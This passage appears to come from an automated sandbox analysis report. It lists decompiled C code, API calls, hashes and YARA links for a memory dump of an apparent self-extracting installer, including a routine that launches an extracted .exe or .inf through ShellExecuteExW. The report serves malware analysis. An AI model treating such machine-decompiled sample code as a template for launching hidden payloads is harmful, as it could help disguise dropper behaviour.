                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                            • API String ID: 4184910265-4124877899
                            • Opcode ID: c9e802b824c2de455642a046b5febf21c2df047e7a94cd8163dd8565d5faf140
                            • Instruction ID: e6dbe33bf7ba4bcdcacf5c061c20181f83bac4961bab4b807396ed7947379beb
                            • Opcode Fuzzy Hash: c9e802b824c2de455642a046b5febf21c2df047e7a94cd8163dd8565d5faf140
                            • Instruction Fuzzy Hash: 7112DCB1A01389AADB26EFA5DC45BED37A9FF44304F10042AF919972D2EB71DD81CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FC190, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009FC190(intOrPtr _a4, long _a8) {
				char _v67;
				intOrPtr _v72;
				signed int _v84;
				int _v88;
				void* _v92;
				intOrPtr _t40;
				intOrPtr _t43;
				struct HWND__* _t45;
				char _t48;

				E009FA388(); // executed
				_t45 = GetDlgItem( *0xa275c8, 0x68);
				_t48 =  *0xa275d6; // 0x1
				if(_t48 == 0) {
					_t43 =  *0xa275e8; // 0x0
					E009F8569(_t43);
					ShowWindow(_t45, 5); // executed
					SendMessageW(_t45, 0xb1, 0, 0xffffffff);
					SendMessageW(_t45, 0xc2, 0, 0xa122e4);
					 *0xa275d6 = 1;
				}
				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
				_v92 = 0x5c;
				SendMessageW(_t45, 0x43a, 0,  &_v92);
				_v67 = 0;
				_t40 = _a4;
				_v88 = 1;
				if(_t40 != 0) {
					_v72 = 0xa0;
					_v88 = 0x40000001;
					_v84 = _v84 & 0xbfffffff | 1;
				}
				SendMessageW(_t45, 0x444, 1,  &_v92);
				SendMessageW(_t45, 0xc2, 0, _a8);
				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t40 != 0) {
					_v84 = _v84 & 0xfffffffe | 0x40000000;
					SendMessageW(_t45, 0x444, 1,  &_v92);
				}
				return SendMessageW(_t45, 0xc2, 0, L"\r\n");
			}












                            0x009fc197
                            0x009fc1b2
                            0x009fc1b9
                            0x009fc1bf
                            0x009fc1c1
                            0x009fc1c7
                            0x009fc1cf
                            0x009fc1de
                            0x009fc1e8
                            0x009fc1ea
                            0x009fc1ea
                            0x009fc1fe
                            0x009fc204
                            0x009fc214
                            0x009fc218
                            0x009fc21c
                            0x009fc221
                            0x009fc227
                            0x009fc232
                            0x009fc23c
                            0x009fc244
                            0x009fc244
                            0x009fc254
                            0x009fc25e
                            0x009fc26d
                            0x009fc271
                            0x009fc27f
                            0x009fc290
                            0x009fc290
                            0x009fc2a4

                            APIs
                              • Part of subcall function 009FA388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 009FA399
                              • Part of subcall function 009FA388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009FA3AA
                              • Part of subcall function 009FA388: IsDialogMessageW.USER32(000201B4,?), ref: 009FA3BE
                              • Part of subcall function 009FA388: TranslateMessage.USER32(?), ref: 009FA3CC
                              • Part of subcall function 009FA388: DispatchMessageW.USER32(?), ref: 009FA3D6
                            • GetDlgItem.USER32(00000068,00A3DE38), ref: 009FC1A4
                            • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,009F9D8F,00000001,?,?,009FA5C0,00A13CB0,00A3DE38), ref: 009FC1CF
                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 009FC1DE
                            • SendMessageW.USER32(00000000,000000C2,00000000,00A122E4), ref: 009FC1E8
                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 009FC1FE
                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 009FC214
                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 009FC254
                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 009FC25E
                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 009FC26D
                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 009FC290
                            • SendMessageW.USER32(00000000,000000C2,00000000,00A1304C), ref: 009FC29B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                            • String ID: \
                            • API String ID: 3569833718-2967466578
                            • Opcode ID: 8ea35ed101d2427e09428e3be0182fd6e38a21a6d4165cc0fbcfa3cdfab74d38
                            • Instruction ID: 4d32263061b7f97d29898eb370dbe132539e196c830d4db276bb8d75419a1f3b
                            • Opcode Fuzzy Hash: 8ea35ed101d2427e09428e3be0182fd6e38a21a6d4165cc0fbcfa3cdfab74d38
                            • Instruction Fuzzy Hash: B02126B12497487BE311EB289C41FBF7BDCEF82754F000618F690961D1C7A59A0A8BB7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FC431, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                            Download Yara Rule
                            C-Code - Quality: 48%
                            			E009FC431(struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, int _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, signed short* _a4168, intOrPtr _a4172) {
				signed short _v0;
				long _v12;
				void* __edi;
				int _t54;
				signed int _t57;
				signed short* _t58;
				long _t68;
				int _t77;
				signed int _t80;
				signed short* _t81;
				signed short _t82;
				intOrPtr _t84;
				long _t86;
				signed short* _t87;
				struct HWND__* _t89;
				signed short* _t91;
				void* _t93;
				void* _t95;
				void* _t99;

				_t54 = 0x1040;
				E009FD940();
				_t91 = _a4168;
				_t77 = 0;
				if( *_t91 == 0) {
					L55:
					return _t54;
				}
				_t54 = E00A02B33(_t91);
				if(0x1040 >= 0x7f6) {
					goto L55;
				} else {
					_t86 = 0x3c;
					E009FE920(_t86,  &_a4, 0, _t86);
					_t84 = _a4172;
					_t99 = _t99 + 0xc;
					_a4.cbSize = _t86;
					_a8 = 0x1c0;
					if(_t84 != 0) {
						_a8 = 0x5c0;
					}
					_t80 =  *_t91 & 0x0000ffff;
					_t87 =  &(_t91[1]);
					_t95 = 0x22;
					if(_t80 != _t95) {
						_t87 = _t91;
					}
					_a20 = _t87;
					_t57 = _t77;
					if(_t80 == 0) {
						L13:
						_t58 = _a24;
						L14:
						if(_t58 == 0 ||  *_t58 == _t77) {
							if(_t84 == 0 &&  *0xa2a602 != _t77) {
								_a24 = 0xa2a602;
							}
						}
						_a32 = 1;
						_t93 = E009EB153(_t87);
						if(_t93 != 0 && E009F1410(_t93, L".inf") == 0) {
							_a16 = L"Install";
						}
						if(E009E9E6B(_a20) != 0) {
							_push(0x800);
							_push( &_a64);
							_push(_a20);
							E009EAED7();
							_a8 =  &_a52;
						}
						_t54 = ShellExecuteExW( &_a4); // executed
						if(_t54 != 0) {
							_t89 = _a4160;
							if( *0xa285f8 != _t77 || _a4168 != _t77 ||  *0xa3de21 != _t77) {
								if(_t89 != 0) {
									_push(_t89);
									if( *0xa1df24() != 0) {
										ShowWindow(_t89, _t77);
										_t77 = 1;
									}
								}
								 *0xa1df20(_a56, 0x7d0);
								E009FC8F0(_a48);
								if( *0xa3de21 != 0 && _a4160 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
									_t68 = _v12;
									if(_t68 >  *0xa3de24) {
										 *0xa3de24 = _t68;
									}
									 *0xa3de22 = 1;
								}
							}
							CloseHandle(_a48);
							if(_t93 == 0 || E009F1410(_t93, L".exe") != 0) {
								_t54 = _a4160;
								if( *0xa285f8 != 0 && _t54 == 0 &&  *0xa3de21 == _t54) {
									 *0xa3de28 = 0x1b58;
								}
							} else {
								_t54 = _a4160;
							}
							if(_t77 != 0 && _t54 != 0) {
								_t54 = ShowWindow(_t89, 1);
							}
						}
						goto L55;
					}
					_t81 = _t91;
					_v0 = 0x20;
					do {
						if( *_t81 == _t95) {
							while(1) {
								_t57 = _t57 + 1;
								if(_t91[_t57] == _t77) {
									break;
								}
								if(_t91[_t57] == _t95) {
									_t82 = _v0;
									_t91[_t57] = _t82;
									L10:
									if(_t91[_t57] == _t82 ||  *((short*)(_t91 + 2 + _t57 * 2)) == 0x2f) {
										if(_t91[_t57] == _v0) {
											_t91[_t57] = 0;
										}
										_t58 =  &(_t91[_t57 + 1]);
										_a24 = _t58;
										goto L14;
									} else {
										goto L12;
									}
								}
							}
						}
						_t82 = _v0;
						goto L10;
						L12:
						_t57 = _t57 + 1;
						_t81 =  &(_t91[_t57]);
					} while ( *_t81 != _t77);
					goto L13;
				}
			}






















                            0x009fc431
                            0x009fc436
                            0x009fc43d
                            0x009fc444
                            0x009fc449
                            0x009fc695
                            0x009fc69d
                            0x009fc69d
                            0x009fc450
                            0x009fc45b
                            0x00000000
                            0x009fc461
                            0x009fc464
                            0x009fc46c
                            0x009fc471
                            0x009fc478
                            0x009fc47b
                            0x009fc47f
                            0x009fc489
                            0x009fc48b
                            0x009fc48b
                            0x009fc493
                            0x009fc496
                            0x009fc49c
                            0x009fc4a0
                            0x009fc4a2
                            0x009fc4a2
                            0x009fc4a4
                            0x009fc4a8
                            0x009fc4ad
                            0x009fc4e5
                            0x009fc4e5
                            0x009fc4e9
                            0x009fc4eb
                            0x009fc4f4
                            0x009fc4ff
                            0x009fc4ff
                            0x009fc4f4
                            0x009fc508
                            0x009fc515
                            0x009fc519
                            0x009fc52a
                            0x009fc52a
                            0x009fc53d
                            0x009fc53f
                            0x009fc548
                            0x009fc549
                            0x009fc54d
                            0x009fc556
                            0x009fc556
                            0x009fc55f
                            0x009fc567
                            0x009fc56d
                            0x009fc580
                            0x009fc595
                            0x009fc597
                            0x009fc5a0
                            0x009fc5a4
                            0x009fc5a6
                            0x009fc5a6
                            0x009fc5a0
                            0x009fc5b1
                            0x009fc5bb
                            0x009fc5c7
                            0x009fc5e6
                            0x009fc5f0
                            0x009fc5f2
                            0x009fc5f2
                            0x009fc5f7
                            0x009fc5f7
                            0x009fc5c7
                            0x009fc602
                            0x009fc60a
                            0x009fc622
                            0x009fc629
                            0x009fc637
                            0x009fc637
                            0x009fc67f
                            0x009fc67f
                            0x009fc67f
                            0x009fc688
                            0x009fc691
                            0x009fc691
                            0x009fc688
                            0x00000000
                            0x009fc694
                            0x009fc4af
                            0x009fc4b1
                            0x009fc4b9
                            0x009fc4bc
                            0x009fc649
                            0x009fc649
                            0x009fc64e
                            0x00000000
                            0x00000000
                            0x009fc647
                            0x009fc655
                            0x009fc659
                            0x009fc4c6
                            0x009fc4ca
                            0x009fc66a
                            0x009fc66e
                            0x009fc66e
                            0x009fc673
                            0x009fc676
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009fc4ca
                            0x009fc647
                            0x009fc650
                            0x009fc4c2
                            0x00000000
                            0x009fc4dc
                            0x009fc4dc
                            0x009fc4dd
                            0x009fc4e0
                            0x00000000
                            0x009fc4b9

                            APIs
                            • ShellExecuteExW.SHELL32(000001C0), ref: 009FC55F
                            • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 009FC5A4
                            • GetExitCodeProcess.KERNEL32 ref: 009FC5DC
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009FC602
                            • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 009FC691
                              • Part of subcall function 009F1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,009EACFE,?,?,?,009EACAD,?,-00000002,?,00000000,?), ref: 009F1426
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                            • String ID: $.exe$.inf
                            • API String ID: 3686203788-2452507128
                            • Opcode ID: a476910830f3241fa202926daba8d1ef5372979cca657da7a43df0cfb977088b
                            • Instruction ID: 22c7482241f505cabe859260383ee84a97ccde1fcd707b8fbffd8f18f20ce8ed
                            • Opcode Fuzzy Hash: a476910830f3241fa202926daba8d1ef5372979cca657da7a43df0cfb977088b
                            • Instruction Fuzzy Hash: B751F1B140838D9AD731EF64EA40ABBB7ECAF85304F04881DF6C1971A0D7B1D989C752
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F06E0, Relevance: 12.1, APIs: 8, Instructions: 117timeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E009F06E0(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _t73;
				void* _t81;
				signed int _t85;
				void* _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				signed int* _t92;
				signed int _t94;

				_t87 = __edx;
				_t90 = __ecx;
				_v80 = E009FDEE0( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76 = _t87;
				if(E009EA995() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16); // executed
					SystemTimeToFileTime( &_v16,  &_v72);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebp");
					asm("adc ecx, ebp");
					_v72.dwLowDateTime = 0 - _v56.dwLowDateTime + _v72.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebp");
					_v72.dwHighDateTime = _v72.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v72);
				}
				FileTimeToSystemTime( &_v72,  &_v48);
				_t92 = _a4;
				_t81 = 1;
				_t85 = _v48.wDay & 0x0000ffff;
				_t94 = _v48.wMonth & 0x0000ffff;
				_t88 = _v48.wYear & 0x0000ffff;
				_t92[3] = _v48.wHour & 0x0000ffff;
				_t92[4] = _v48.wMinute & 0x0000ffff;
				_t92[5] = _v48.wSecond & 0x0000ffff;
				_t92[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t92 = _v48.wYear & 0x0000ffff;
				_t92[1] = _t94;
				_t92[2] = _t85;
				_t92[8] = _t85 - 1;
				if(_t94 > 1) {
					_t89 = 0xa1d084;
					_t86 = 4;
					while(_t86 <= 0x30) {
						_t86 = _t86 + 4;
						_t92[8] = _t92[8] +  *_t89;
						_t89 = _t89 + 4;
						_t81 = _t81 + 1;
						if(_t81 < _t94) {
							continue;
						}
						break;
					}
					_t88 = _v48.wYear & 0x0000ffff;
				}
				if(_t94 > 2 && E009F0849(_t88) != 0) {
					_t92[8] = _t92[8] + 1;
				}
				_t73 = E009FDF50( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x3b9aca00, 0);
				_t92[6] = _t73;
				return _t73;
			}




















                            0x009f06e0
                            0x009f06e7
                            0x009f06f8
                            0x009f06fc
                            0x009f0710
                            0x009f072e
                            0x009f073b
                            0x009f0751
                            0x009f075d
                            0x009f076b
                            0x009f0773
                            0x009f0779
                            0x009f077f
                            0x009f0783
                            0x009f0785
                            0x009f0712
                            0x009f071c
                            0x009f071c
                            0x009f0793
                            0x009f0795
                            0x009f07a0
                            0x009f07a1
                            0x009f07a6
                            0x009f07ab
                            0x009f07b0
                            0x009f07b8
                            0x009f07c0
                            0x009f07c8
                            0x009f07ce
                            0x009f07d0
                            0x009f07d3
                            0x009f07d6
                            0x009f07db
                            0x009f07df
                            0x009f07e4
                            0x009f07e5
                            0x009f07ec
                            0x009f07ef
                            0x009f07f2
                            0x009f07f5
                            0x009f07f8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f07f8
                            0x009f07fa
                            0x009f07fa
                            0x009f0802
                            0x009f080e
                            0x009f080e
                            0x009f081d
                            0x009f0823
                            0x009f082c

                            APIs
                            • __aulldiv.LIBCMT ref: 009F06F3
                              • Part of subcall function 009EA995: GetVersionExW.KERNEL32(?), ref: 009EA9BA
                            • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 009F071C
                            • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 009F072E
                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 009F073B
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 009F0751
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 009F075D
                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 009F0793
                            • __aullrem.LIBCMT ref: 009F081D
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                            • String ID:
                            • API String ID: 1247370737-0
                            • Opcode ID: cb72208aa4c6bd7f64e18c7992053f96088479e4cfd19d18e866e5fe51498265
                            • Instruction ID: 3ed216469e7f3c4c78592a21d06858ae72b434d6da3c75705fd8118f2b7ea415
                            • Opcode Fuzzy Hash: cb72208aa4c6bd7f64e18c7992053f96088479e4cfd19d18e866e5fe51498265
                            • Instruction Fuzzy Hash: 83413BB64083099FC710DF65C880AABF7F9FF88744F004A2EF69692251E735E548CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A095A5, Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                            Download Yara Rule
                            C-Code - Quality: 71%
                            			E00A095A5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t57;
				signed int _t59;
				short* _t61;
				signed int _t65;
				short* _t69;
				int _t77;
				short* _t80;
				signed int _t86;
				signed int _t89;
				void* _t94;
				void* _t95;
				int _t97;
				short* _t100;
				int _t102;
				int _t104;
				signed int _t105;
				short* _t106;
				void* _t109;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0xa1d668; // 0xda86b1c8
				_v8 = _t49 ^ _t105;
				_push(__esi);
				_t102 = _a20;
				if(_t102 > 0) {
					_t77 = E00A0DBBC(_a16, _t102);
					_t109 = _t77 - _t102;
					_t4 = _t77 + 1; // 0x1
					_t102 = _t4;
					if(_t109 >= 0) {
						_t102 = _t77;
					}
				}
				_t97 = _a32;
				if(_t97 == 0) {
					_t97 =  *( *_a4 + 8);
					_a32 = _t97;
				}
				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E009FE203(_t54, _v8 ^ _t105);
				} else {
					_t94 = _t54 + _t54;
					_t84 = _t94 + 8;
					asm("sbb eax, eax");
					if((_t94 + 0x00000008 & _t54) == 0) {
						_t80 = 0;
						__eflags = 0;
						L14:
						if(_t80 == 0) {
							L36:
							_t104 = 0;
							L37:
							E00A0980D(_t80);
							_t54 = _t104;
							goto L38;
						}
						_t57 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t80, _v12);
						_t120 = _t57;
						if(_t57 == 0) {
							goto L36;
						}
						_t99 = _v12;
						_t59 = E00A09C64(_t84, _t102, _t120, _a8, _a12, _t80, _v12, 0, 0, 0, 0, 0); // executed
						_t104 = _t59;
						if(_t104 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t95 = _t104 + _t104;
							_t86 = _t95 + 8;
							__eflags = _t95 - _t86;
							asm("sbb eax, eax");
							__eflags = _t86 & _t59;
							if((_t86 & _t59) == 0) {
								_t100 = 0;
								__eflags = 0;
								L30:
								__eflags = _t100;
								if(__eflags == 0) {
									L35:
									E00A0980D(_t100);
									goto L36;
								}
								_t61 = E00A09C64(_t86, _t104, __eflags, _a8, _a12, _t80, _v12, _t100, _t104, 0, 0, 0);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
								__eflags = _t104;
								if(_t104 != 0) {
									E00A0980D(_t100);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t89 = _t95 + 8;
							__eflags = _t95 - _t89;
							asm("sbb eax, eax");
							_t65 = _t59 & _t89;
							_t86 = _t95 + 8;
							__eflags = _t65 - 0x400;
							if(_t65 > 0x400) {
								__eflags = _t95 - _t86;
								asm("sbb eax, eax");
								_t100 = E00A07A8A(_t86, _t65 & _t86);
								_pop(_t86);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L35;
								}
								 *_t100 = 0xdddd;
								L28:
								_t100 =  &(_t100[4]);
								goto L30;
							}
							__eflags = _t95 - _t86;
							asm("sbb eax, eax");
							E00A10EE0();
							_t100 = _t106;
							__eflags = _t100;
							if(_t100 == 0) {
								goto L35;
							}
							 *_t100 = 0xcccc;
							goto L28;
						}
						_t69 = _a28;
						if(_t69 == 0) {
							goto L37;
						}
						_t124 = _t104 - _t69;
						if(_t104 > _t69) {
							goto L36;
						}
						_t104 = E00A09C64(0, _t104, _t124, _a8, _a12, _t80, _t99, _a24, _t69, 0, 0, 0);
						if(_t104 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t71 = _t54 & _t94 + 0x00000008;
					_t84 = _t94 + 8;
					if((_t54 & _t94 + 0x00000008) > 0x400) {
						__eflags = _t94 - _t84;
						asm("sbb eax, eax");
						_t80 = E00A07A8A(_t84, _t71 & _t84);
						_pop(_t84);
						__eflags = _t80;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t80 = 0xdddd;
						L12:
						_t80 =  &(_t80[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00A10EE0();
					_t80 = _t106;
					if(_t80 == 0) {
						goto L36;
					}
					 *_t80 = 0xcccc;
					goto L12;
				}
			}


























                            0x00a095aa
                            0x00a095ab
                            0x00a095ac
                            0x00a095b3
                            0x00a095b7
                            0x00a095b8
                            0x00a095be
                            0x00a095c4
                            0x00a095ca
                            0x00a095cd
                            0x00a095cd
                            0x00a095d0
                            0x00a095d2
                            0x00a095d2
                            0x00a095d0
                            0x00a095d4
                            0x00a095d9
                            0x00a095e0
                            0x00a095e3
                            0x00a095e3
                            0x00a095ff
                            0x00a09605
                            0x00a0960a
                            0x00a0979d
                            0x00a097b0
                            0x00a09610
                            0x00a09610
                            0x00a09613
                            0x00a09618
                            0x00a0961c
                            0x00a09670
                            0x00a09670
                            0x00a09672
                            0x00a09674
                            0x00a09792
                            0x00a09792
                            0x00a09794
                            0x00a09795
                            0x00a0979b
                            0x00000000
                            0x00a0979b
                            0x00a09685
                            0x00a0968b
                            0x00a0968d
                            0x00000000
                            0x00000000
                            0x00a09693
                            0x00a096a5
                            0x00a096aa
                            0x00a096ae
                            0x00000000
                            0x00000000
                            0x00a096bb
                            0x00a096f5
                            0x00a096f8
                            0x00a096fb
                            0x00a096fd
                            0x00a096ff
                            0x00a09701
                            0x00a0974d
                            0x00a0974d
                            0x00a0974f
                            0x00a0974f
                            0x00a09751
                            0x00a0978b
                            0x00a0978c
                            0x00000000
                            0x00a09791
                            0x00a09765
                            0x00a0976a
                            0x00a0976c
                            0x00000000
                            0x00000000
                            0x00a09770
                            0x00a09771
                            0x00a09772
                            0x00a09775
                            0x00a097b1
                            0x00a097b4
                            0x00a09777
                            0x00a09777
                            0x00a09778
                            0x00a09778
                            0x00a09785
                            0x00a09787
                            0x00a09789
                            0x00a097ba
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a09789
                            0x00a09703
                            0x00a09706
                            0x00a09708
                            0x00a0970a
                            0x00a0970c
                            0x00a0970f
                            0x00a09714
                            0x00a0972f
                            0x00a09731
                            0x00a0973b
                            0x00a0973d
                            0x00a0973e
                            0x00a09740
                            0x00000000
                            0x00000000
                            0x00a09742
                            0x00a09748
                            0x00a09748
                            0x00000000
                            0x00a09748
                            0x00a09716
                            0x00a09718
                            0x00a0971c
                            0x00a09721
                            0x00a09723
                            0x00a09725
                            0x00000000
                            0x00000000
                            0x00a09727
                            0x00000000
                            0x00a09727
                            0x00a096bd
                            0x00a096c2
                            0x00000000
                            0x00000000
                            0x00a096c8
                            0x00a096ca
                            0x00000000
                            0x00000000
                            0x00a096e6
                            0x00a096ea
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a096f0
                            0x00a09623
                            0x00a09625
                            0x00a09627
                            0x00a0962f
                            0x00a0964e
                            0x00a09650
                            0x00a0965a
                            0x00a0965c
                            0x00a0965d
                            0x00a0965f
                            0x00000000
                            0x00000000
                            0x00a09665
                            0x00a0966b
                            0x00a0966b
                            0x00000000
                            0x00a0966b
                            0x00a09633
                            0x00a09637
                            0x00a0963c
                            0x00a09640
                            0x00000000
                            0x00000000
                            0x00a09646
                            0x00000000
                            0x00a09646

                            APIs
                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A0451B,00A0451B,?,?,?,00A097F6,00000001,00000001,31E85006), ref: 00A095FF
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A097F6,00000001,00000001,31E85006,?,?,?), ref: 00A09685
                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,31E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A0977F
                            • __freea.LIBCMT ref: 00A0978C
                              • Part of subcall function 00A07A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A02FA6,?,0000015D,?,?,?,?,00A04482,000000FF,00000000,?,?), ref: 00A07ABC
                            • __freea.LIBCMT ref: 00A09795
                            • __freea.LIBCMT ref: 00A097BA
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                            • String ID:
                            • API String ID: 1414292761-0
                            • Opcode ID: 66ed369cf98a304e455db798a2f184a03ef60858032b69fe6d4ca68a488689f6
                            • Instruction ID: 99edca01cafda4b1d3fa546774e87748230c80ceb0e4f8bd1786bbab6cd1c0fa
                            • Opcode Fuzzy Hash: 66ed369cf98a304e455db798a2f184a03ef60858032b69fe6d4ca68a488689f6
                            • Instruction Fuzzy Hash: B751D17362021AAFEB259F64EC81EAF77A9EB44750F158628FD14D61D2EB34DC40C6A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F0910, Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
